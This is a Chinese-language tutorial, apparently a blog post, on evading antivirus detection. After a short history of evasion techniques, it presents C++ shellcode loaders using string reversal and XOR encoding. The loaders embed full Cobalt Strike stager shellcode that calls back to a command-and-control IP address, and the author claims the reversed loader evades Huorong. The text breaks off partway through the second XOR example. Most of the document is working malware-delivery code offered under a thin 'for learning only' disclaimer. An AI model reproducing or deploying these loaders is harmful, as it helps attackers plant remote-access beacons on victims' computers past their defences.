目录
一、免杀简述
二、免杀方法
1.shellcode反转bypass
2.shellcode异或bypass
3.远程加载shellcode bypass
4.进程注入
5.未导出api bypass
6.掩日(进程注入工具)
其他的
本文章仅提供学习,切勿将其用于不法手段!
一、免杀简述
理论上讲,免杀⼀定是出现在杀毒软件之后的。⽽通过杀毒软件的发展史不难知 道,第⼀款杀毒软件 kill 1.0是Wish公司1987年推出的,也就是说免杀技术⾄少是在 1989年以后才发展起来的。
1989年:第⼀款杀毒软件Mcafee诞⽣,标志着反病毒与反查杀时代的到来。 发展历史
1997年:国内出现了第⼀个可以⾃动变异的千⾯⼈病毒(Polymorphic/Mutation Virus)。⾃动变异就 是病毒针对杀毒软件的免杀⽅法之⼀,但是与免杀⼿法的定义 有出⼊。
2002年7⽉31⽇:国内第⼀个真正意义上的变种病毒“中国⿊客II”出现,它除了具有 新的特征之外,还 实现了“中国⿊客”第⼀代所未实现的功能,可⻅这个变种也是病 毒编写者⾃⼰制造的。
2004年:在⿊客圈⼦内部,免杀技术是由⿊客动画吧在这⼀年⾸先公开提出,由于 当时还没有CLL等专 ⽤免杀⼯具,所以⼀般都使⽤WinHEX逐字节更改。
2005年1⽉:⼤名鼎鼎的免杀⼯具CCL的软件作者tankaiha在杂志上发表了⼀篇⽂ 章,藉此推⼴了 CCL,从此国内⿊客界才有了⾃⼰第⼀个专⻔⽤于免杀的⼯具。
2005年2⽉-7⽉:通过各⽅⾯有意或⽆意的宣传,⿊客爱好者们开始逐渐重视免 杀,在类似于免杀技术 界的祖师爷⿊吧安全⽹的浩天⽼师带领下⼀批⿊客开始有越 来越多的讨论免杀技术,这为以后⽊⻢免杀 的⽕爆埋下根基。
2005年08⽉:第⼀个可查的关于免杀的动画由⿊吧的浩天⽼师完成,为⼤量⿊客爱 好者提供了⼀个有 效的参考,成功地对免杀技术进⾏了第⼀次科普
2005年09⽉:免杀技术开始真正的⽕起来。 由上⾯的信息可⻅,国内在1997年出现了第⼀个可以⾃动变异的千⾯⼈病毒,虽然 ⾃动变异也可以看 为是针对杀毒软件的⼀种免杀⽅法,但是由于与免杀⼿法的定义 有出⼊,所以如果将国内免杀技术起源 定位1997年会显得⽐较牵强。
⼀直等到2002年7⽉31⽇,国内第⼀个真正意义上的变种病毒“中国⿊客II”才迟迟出 现,因此我们暂且 可以将国内免杀技术的起源定位在2002年7⽉。
如今:在国内hw的加持下,⽊⻢、⼯具免杀也越来越被重视。免杀技术在红队中也成为了必不可少的技 能。
二、免杀方法
1.shellcode反转bypass
使用cobaltstrike进行shellcode的生成,使用c++做一个加载器
#include <Windows.h> int main() { unsigned char buf[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x0a\x1a\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x63\x34\x54\x72\x00\x85\x9f\x68\x62\x66\x6a\x7b\x29\xc9\x73\x59\x1d\x66\xfb\xf5\x09\x12\xc1\x5f\xfb\x19\xf1\x65\xb6\x2d\xe7\x25\xbe\xd8\x75\xdf\x55\xa5\x04\xa3\x8b\xc0\xa2\xd0\x68\x0a\x9e\x02\x1a\xcd\x4c\xd5\x9f\x58\xb2\xdf\x82\x11\x15\x72\xf3\xa2\x2b\xd5\xbd\xdb\x03\x28\x2f\x75\x46\x45\xac\x62\xec\xf2\x25\x0e\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x29\x0d\x0a\x00\x8c\xe0\xde\xa9\xce\xd0\x65\x65\xda\x6f\xc7\xf2\x92\xbe\x60\x70\xa9\x65\x43\xe5\x02\x19\x85\x6b\x4e\x60\x60\x0b\x99\x5c\x61\x00\x30\x31\x0d\x1a\xcd\xf5\x0f\xdf\xd6\x22\x85\xc7\xf1\x8c\x2f\xd6\x4d\xac\xc6\x57\x6b\xd4\x20\xa6\xfd\x00\xbe\xf5\x26\x79\xe9\x94\x7e\xbf\x11\x8c\x8e\xdc\xda\x26\x0b\x40\xb3\x47\x2e\x12\xa6\x92\x4b\x93\x2f\xe7\x71\x70\xaf\x3d\x42\x84\x73\xa1\xfe\xda\x41\xd6\x2e\x6c\x02\xd2\x06\x8e\x9e\xf6\x71\xa0\xa9\x31\xb4\x06\xbb\x45\x12\xe8\x0a\x3f\x28\x9c\xbb\xe0\x21\x30\xf8\x4a\x71\xb4\xb1\xbf\x66\x20\x1e\xa0\x68\x37\x0e\x08\x09\x0f\xab\xb8\xf7\xc1\xdf\x81\x5c\x2b\xb9\x11\x85\xbe\xc8\xbb\x75\xbe\xac\x5c\xbc\x2d\x69\x3d\x25\x69\x41\x30\x6c\x0a\xb4\xd7\x69\x95\x49\xe2\x51\xd3\x30\xef\x77\x2d\xe6\x0a\x27\xb3\x11\x82\xf1\x16\xe1\xc5\x8a\xbc\x24\x3c\x77\x7c\x53\x4b\x2e\xab\x76\xcd\xbf\xee\xc2\x1d\x1c\xf4\x20\x8e\x88\x3d\xf4\xca\x68\xb9\xd2\xf5\x2b\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x35\x2e\x31\x33\x00\x6f\xaa\x51\xc3"; void* exe = VirtualAlloc(0, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(exe, buf, sizeof(buf)); ((void(*)())exe)(); }
是可以检测到的
我们使用python将整个shellcode去掉\x之后转置(str[::-1])
fc4883e4f0e8c8000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d0668178180b0275728b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e94fffffff5d6a0049be77696e696e65740041564989e64c89f141ba4c772607ffd54831c94831d24d31c04d31c94150415041ba3a5679a7ffd5eb735a4889c141b80a1a00004d31c9415141516a03415141ba57899fc6ffd5eb595b4889c14831d24989d84d31c9526800024084525241baeb552e3bffd54889c64883c3506a0a5f4889f14889da49c7c0ffffffff4d31c9525241ba2d06187bffd585c00f859d01000048ffcf0f848c010000ebd3e9e4010000e8a2ffffff2f6334547200859f6862666a7b29c973591d66fbf50912c15ffb19f165b62de725bed875df55a504a38bc0a2d0680a9e021acd4cd59f58b2df82111572f3a22bd5bddb03282f754645ac62ecf2250e00557365722d4167656e743a204d6f7a696c6c612f352e302028636f6d70617469626c653b204d5349452031302e303b2057696e646f7773204e5420362e313b20574f5736343b2054726964656e742f362e30290d0a008ce0dea9ced06565da6fc7f292be6070a96543e50219856b4e60600b995c610030310d1acdf50fdfd62285c7f18c2fd64dacc6576bd420a6fd00bef52679e9947ebf118c8edcda260b40b3472e12a6924b932fe77170af3d428473a1feda41d62e6c02d2068e9ef671a0a931b406bb4512e80a3f289cbbe02130f84a71b4b1bf66201ea068370e08090fabb8f7c1df815c2bb91185bec8bb75beac5cbc2d693d256941306c0ab4d7699549e251d330ef772de60a27b31182f116e1c58abc243c777c534b2eab76cdbfeec21d1cf4208e883df4ca68b9d2f52b0041bef0b5a256ffd54831c9ba0000400041b80010000041b94000000041ba58a453e5ffd5489353534889e74889f14889da41b8002000004989f941ba129689e2ffd54883c42085c074b6668b074801c385c075d758585848050000000050c3e89ffdffff3139322e3136382e31352e3133006faa51c3
然后使用加载器进行木马生成
#include <Windows.h> #include <stdio.h> #pragma warning(disable:4996); int main() { char *str = "shellcode"; unsigned int char_in_hex; unsigned int iterations = strlen(str); unsigned int memory_allocation = strlen(str) / 2; char* temp = (char*)VirtualAlloc(0, memory_allocation, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); int p = 0; for (int i = strlen(str) - 1; i >= 0; i--) { temp[p++] = str[i]; } char* shellcode = (char*)temp; for (int i = 0; i < iterations - 1; i++) { sscanf(shellcode + 2 * i, "%2X", &char_in_hex); shellcode[i] = (char)char_in_hex; } void* exec = VirtualAlloc(0, memory_allocation, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(exec, shellcode, memory_allocation) (*(void(*WINAPI)()) exec)(); return 0; }
火绒免杀
2.shellcode异或bypass
使用cobaltstrike进行shellcode的生成,使用c++做一个加载器
#include <Windows.h> int main() { unsigned char buf[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x0\x0\x0\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\xf\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x2\x2c\x20\x41\xc1\xc9\xd\x41\x1\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x1\xd0\x66\x81\x78\x18\xb\x2\x75\x72\x8b\x80\x88\x0\x0\x0\x48\x85\xc0\x74\x67\x48\x1\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x1\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x1\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\xd\x41\x1\xc1\x38\xe0\x75\xf1\x4c\x3\x4c\x24\x8\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x1\xd0\x66\x41\x8b\xc\x48\x44\x8b\x40\x1c\x49\x1\xd0\x41\x8b\x4\x88\x48\x1\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x0\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x0\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x7\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\xa\x1a\x0\x0\x4d\x31\xc9\x41\x51\x41\x51\x6a\x3\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x0\x2\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\xa\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x6\x18\x7b\xff\xd5\x85\xc0\xf\x85\x9d\x1\x0\x0\x48\xff\xcf\xf\x84\x8c\x1\x0\x0\xeb\xd3\xe9\xe4\x1\x0\x0\xe8\xa2\xff\xff\xff\x2f\x6f\x47\x73\x34\x0\x31\x7b\x32\x49\x4f\x66\x9d\xa0\x93\x90\x83\x47\xa4\xa4\xe5\x4f\xcc\x89\x95\xd9\x20\x98\x59\x6f\xc4\xdd\x66\x17\x58\x48\x60\x4e\xa3\x51\x68\x7b\x4d\x0\x44\x60\x77\x53\xed\xd8\xe1\xca\x8a\x52\x5d\xe1\x68\x7e\x4e\x79\xd7\x80\x62\x9\xcd\x57\x86\xcd\x5f\x5c\x69\xbd\x6\xf1\x49\x5c\xc8\x3d\xbe\x0\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x29\xd\xa\x0\x98\xc\x44\x13\x56\x14\x5b\x4e\x35\xaa\x66\x55\xc1\x9c\xb\xcd\x71\x92\xc2\x13\x76\xde\x74\x38\x82\x7d\xf4\x4\xdd\x51\x28\x9b\xfa\x89\xb2\x30\x63\x6b\x34\x45\xe8\x4c\x63\xdf\xe9\x80\x5a\x6d\xee\xdd\x5a\x98\x18\xd\x9f\xa4\xb4\x87\xfc\xa1\xcd\x52\x18\x2b\x6b\x7b\x4d\xda\x6b\x39\x35\x7b\x4\x4c\x70\x31\x74\xa2\xfd\xf4\x3b\xd\x86\xe0\xaf\x33\x41\x53\x46\x7c\x89\x15\xde\x27\xe6\xca\x0\xbd\x9d\xaf\xcf\xc8\x2a\xec\xcb\xa9\x8e\xf\xd9\x3b\xe1\x3\x9c\x78\x43\x46\x88\x1b\xa6\xc0\x22\xf8\xad\x74\xa5\x79\xd7\xc3\x52\xe1\x3d\xdd\x57\xb1\x93\x0\x79\xba\x79\xf3\x74\x5d\x5f\xe\xa8\x3e\xbd\x21\xdd\x22\xa3\x2a\x85\x84\xbe\x87\x6c\x4c\xc5\x69\xe8\xbf\x1d\x5a\x20\x42\xd8\x50\xe0\xc9\x68\x90\x48\xe\x95\xd3\xf6\xb2\x88\xf9\x1f\x6a\xc4\xd7\x23\x12\xeb\x97\xf2\xd0\x62\x64\x91\x47\x71\xa4\x76\x86\xc2\xf\xe6\xfc\x4e\x72\x13\x72\x5c\x2\x85\xa7\x15\x78\x37\xba\x67\x2c\xbe\x6d\xea\x83\x90\x7d\xb5\x47\x0\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x0\x0\x40\x0\x41\xb8\x0\x10\x0\x0\x41\xb9\x40\x0\x0\x0\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x0\x20\x0\x0\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x7\x48\x1\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x5\x0\x0\x0\x0\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x35\x2e\x31\x33\x0\x6f\xaa\x51\xc3"; void* exe = VirtualAlloc(0, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(exe, buf, sizeof(buf)); ((void(*)())exe)(); }
同样被杀
对shellcode进行异或,异或一个66
#include <Windows.h> #include <stdio.h> void main() { unsigned char buf[] = "\xce\x7a\xb1\xd6\xc2\xda\xfa\x32\x32\x32\x73\x63\x73\x62\x60\x63\x64\x7a\x3\xe0\x57\x7a\xb9\x60\x52\x7a\xb9\x60\x2a\x7a\xb9\x60\x12\x7a\xb9\x40\x62\x7a\x3d\x85\x78\x78\x7f\x3\xfb\x7a\x3\xf2\x9e\xe\x53\x4e\x30\x1e\x12\x73\xf3\xfb\x3f\x73\x33\xf3\xd0\xdf\x60\x73\x63\x7a\xb9\x60\x12\xb9\x70\xe\x7a\x33\xe2\x54\xb3\x4a\x2a\x39\x30\x47\x40\xb9\xb2\xba\x32\x32\x32\x7a\xb7\xf2\x46\x55\x7a\x33\xe2\x62\xb9\x7a\x2a\x76\xb9\x72\x12\x7b\x33\xe2\xd1\x64\x7a\xcd\xfb\x73\xb9\x6\xba\x7a\x33\xe4\x7f\x3\xfb\x7a\x3\xf2\x9e\x73\xf3\xfb\x3f\x73\x33\xf3\xa\xd2\x47\xc3\x7e\x31\x7e\x16\x3a\x77\xb\xe3\x47\xea\x6a\x76\xb9\x72\x16\x7b\x33\xe2\x54\x73\xb9\x3e\x7a\x76\xb9\x72\x2e\x7b\x33\xe2\x73\xb9\x36\xba\x7a\x33\xe2\x73\x6a\x73\x6a\x6c\x6b\x68\x73\x6a\x73\x6b\x73\x68\x7a\xb1\xde\x12\x73\x60\xcd\xd2\x6a\x73\x6b\x68\x7a\xb9\x20\xdb\x7d\xcd\xcd\xcd\x6f\x58\x32\x7b\x8c\x45\x5b\x5c\x5b\x5c\x57\x46\x32\x73\x64\x7b\xbb\xd4\x7e\xbb\xc3\x73\x88\x7e\x45\x14\x35\xcd\xe7\x7a\x3\xfb\x7a\x3\xe0\x7f\x3\xf2\x7f\x3\xfb\x73\x62\x73\x62\x73\x88\x8\x64\x4b\x95\xcd\xe7\xd9\x41\x68\x7a\xbb\xf3\x73\x8a\x38\x28\x32\x32\x7f\x3\xfb\x73\x63\x73\x63\x58\x31\x73\x63\x73\x88\x65\xbb\xad\xf4\xcd\xe7\xd9\x6b\x69\x7a\xbb\xf3\x7a\x3\xe0\x7b\xbb\xea\x7f\x3\xfb\x60\x5a\x32\x30\x72\xb6\x60\x60\x73\x88\xd9\x67\x1c\x9\xcd\xe7\x7a\xbb\xf4\x7a\xb1\xf1\x62\x58\x38\x6d\x7a\xbb\xc3\x7a\xbb\xe8\x7b\xf5\xf2\xcd\xcd\xcd\xcd\x7f\x3\xfb\x60\x60\x73\x88\x1f\x34\x2a\x49\xcd\xe7\xb7\xf2\x3d\xb7\xaf\x33\x32\x32\x7a\xcd\xfd\x3d\xb6\xbe\x33\x32\x32\xd9\xe1\xdb\xd6\x33\x32\x32\xda\x90\xcd\xcd\xcd\x1d\x5d\x75\x41\x6\x32\x3\x49\x0\x7b\x7d\x54\xaf\x92\xa1\xa2\xb1\x75\x96\x96\xd7\x7d\xfe\xbb\xa7\xeb\x12\xaa\x6b\x5d\xf6\xef\x54\x25\x6a\x7a\x52\x7c\x91\x63\x5a\x49\x7f\x32\x76\x52\x45\x61\xdf\xea\xd3\xf8\xb8\x60\x6f\xd3\x5a\x4c\x7c\x4b\xe5\xb2\x50\x3b\xff\x65\xb4\xff\x6d\x6e\x5b\x8f\x34\xc3\x7b\x6e\xfa\xf\x8c\x32\x67\x41\x57\x40\x1f\x73\x55\x57\x5c\x46\x8\x12\x7f\x5d\x48\x5b\x5e\x5e\x53\x1d\x7\x1c\x2\x12\x1a\x51\x5d\x5f\x42\x53\x46\x5b\x50\x5e\x57\x9\x12\x7f\x61\x7b\x77\x12\x3\x2\x1c\x2\x9\x12\x65\x5b\x5c\x56\x5d\x45\x41\x12\x7c\x66\x12\x4\x1c\x0\x9\x12\x66\x40\x5b\x56\x57\x5c\x46\x1d\x4\x1c\x2\x1b\x3f\x38\x32\xaa\x3e\x76\x21\x64\x26\x69\x7c\x7\x98\x54\x67\xf3\xae\x39\xff\x43\xa0\xf0\x21\x44\xec\x46\xa\xb0\x4f\xc6\x36\xef\x63\x1a\xa9\xc8\xbb\x80\x2\x51\x59\x6\x77\xda\x7e\x51\xed\xdb\xb2\x68\x5f\xdc\xef\x68\xaa\x2a\x3f\xad\x96\x86\xb5\xce\x93\xff\x60\x2a\x19\x59\x49\x7f\xe8\x59\xb\x7\x49\x36\x7e\x42\x3\x46\x90\xcf\xc6\x9\x3f\xb4\xd2\x9d\x1\x73\x61\x74\x4e\xbb\x27\xec\x15\xd4\xf8\x32\x8f\xaf\x9d\xfd\xfa\x18\xde\xf9\x9b\xbc\x3d\xeb\x9\xd3\x31\xae\x4a\x71\x74\xba\x29\x94\xf2\x10\xca\x9f\x46\x97\x4b\xe5\xf1\x60\xd3\xf\xef\x65\x83\xa1\x32\x4b\x88\x4b\xc1\x46\x6f\x6d\x3c\x9a\xc\x8f\x13\xef\x10\x91\x18\xb7\xb6\x8c\xb5\x5e\x7e\xf7\x5b\xda\x8d\x2f\x68\x12\x70\xea\x62\xd2\xfb\x5a\xa2\x7a\x3c\xa7\xe1\xc4\x80\xba\xcb\x2d\x58\xf6\xe5\x11\x20\xd9\xa5\xc0\xe2\x50\x56\xa3\x75\x43\x96\x44\xb4\xf0\x3d\xd4\xce\x7c\x40\x21\x40\x6e\x30\xb7\x95\x27\x4a\x5\x88\x55\x1e\x8c\x5f\xd8\xb1\xa2\x4f\x87\x75\x32\x73\x8c\xc2\x87\x90\x64\xcd\xe7\x7a\x3\xfb\x88\x32\x32\x72\x32\x73\x8a\x32\x22\x32\x32\x73\x8b\x72\x32\x32\x32\x73\x88\x6a\x96\x61\xd7\xcd\xe7\x7a\xa1\x61\x61\x7a\xbb\xd5\x7a\xbb\xc3\x7a\xbb\xe8\x73\x8a\x32\x12\x32\x32\x7b\xbb\xcb\x73\x88\x20\xa4\xbb\xd0\xcd\xe7\x7a\xb1\xf6\x12\xb7\xf2\x46\x84\x54\xb9\x35\x7a\x33\xf1\xb7\xf2\x47\xe5\x6a\x6a\x6a\x7a\x37\x32\x32\x32\x32\x62\xf1\xda\xad\xcf\xcd\xcd\x3\xb\x0\x1c\x3\x4\xa\x1c\x3\x7\x1c\x3\x1\x32\x5d\x98\x63\xf1"; for (size_t i = 0; i < sizeof buf -1; i++) { buf[i] ^= 50; printf("\\x%x", buf[i]); } void* exe = VirtualAlloc(0, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(exe, buf, sizeof(buf)); ((void(*)())exe)(); DWORD temp; VirtualProtect(buf, sizeof buf, PAGE_EXECUTE, &temp); ((void(*)())buf)(); }
再异或一个
#include <Windows.h> #include <stdio.h> void main() { unsigned char buf[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x0a\x1a\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x63\x34\x54\x72\x00\x85\x9f\x68\x62\x66\x6a\x7b\x29\xc9\x73\x59\x1d\x66\xfb\xf5\x09\x12\xc1\x5f\xfb\x19\xf1\x65\xb6\x2d\xe7\x25\xbe\xd8\x75\xdf\x55\xa5\x04\xa3\x8b\xc0\xa2\xd0\x68\x0a\x9e\x02\x1a\xcd\x4c\xd5\x9f\x58\xb2\xdf\x82\x11\x15\x72\xf3\xa2\x2b\xd5\xbd\xdb\x03\x28\x2f\x75\x46\x45\xac\x62\xec\xf2\x25\x0e\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x29\x0d\x0a\x00\x8c\xe0\xde\xa9\xce\xd0\x65\x65\xda\x6f\xc7\xf2\x92\xbe\x60\x70\xa9\x65\x43\xe5\x02\x19\x85\x6b\x4e\x60\x60\x0b\x99\x5c\x61\x00\x30\x31\x0d\x1a\xcd\xf5\x0f\xdf\xd6\x22\x85\xc7\xf1\x8c\x2f\xd6\x4d\xac\xc6\x57\x6b\xd4\x20\xa6\xfd\x00\xbe\xf5\x26\x79\xe9\x94\x7e\xbf\x11\x8c\x8e\xdc\xda\x26\x0b\x40\xb3\x47\x2e\x12\xa6\x92\x4b\x93\x2f\xe7\x71\x70\xaf\x3d\x42\x84\x73\xa1\xfe\xda\x41\xd6\x2e\x6c\x02\xd2\x06\x8e\x9e\xf6\x71\xa0\xa9\x31\xb4\x06\xbb\x45\x12\xe8\x0a\x3f\x28\x9c\xbb\xe0\x21\x30\xf8\x4a\x71\xb4\xb1\xbf\x66\x20\x1e\xa0\x68\x37\x0e\x08\x09\x0f\xab\xb8\xf7\xc1\xdf\x81\x5c\x2b\xb9\x11\x85\xbe\xc8\xbb\x75\xbe\xac\x5c\xbc\x2d\x69\x3d\x25\x69\x41\x30\x6c\x0a\xb4\xd7\x69\x95\x49\xe2\x51\xd3\x30\xef\x77\x2d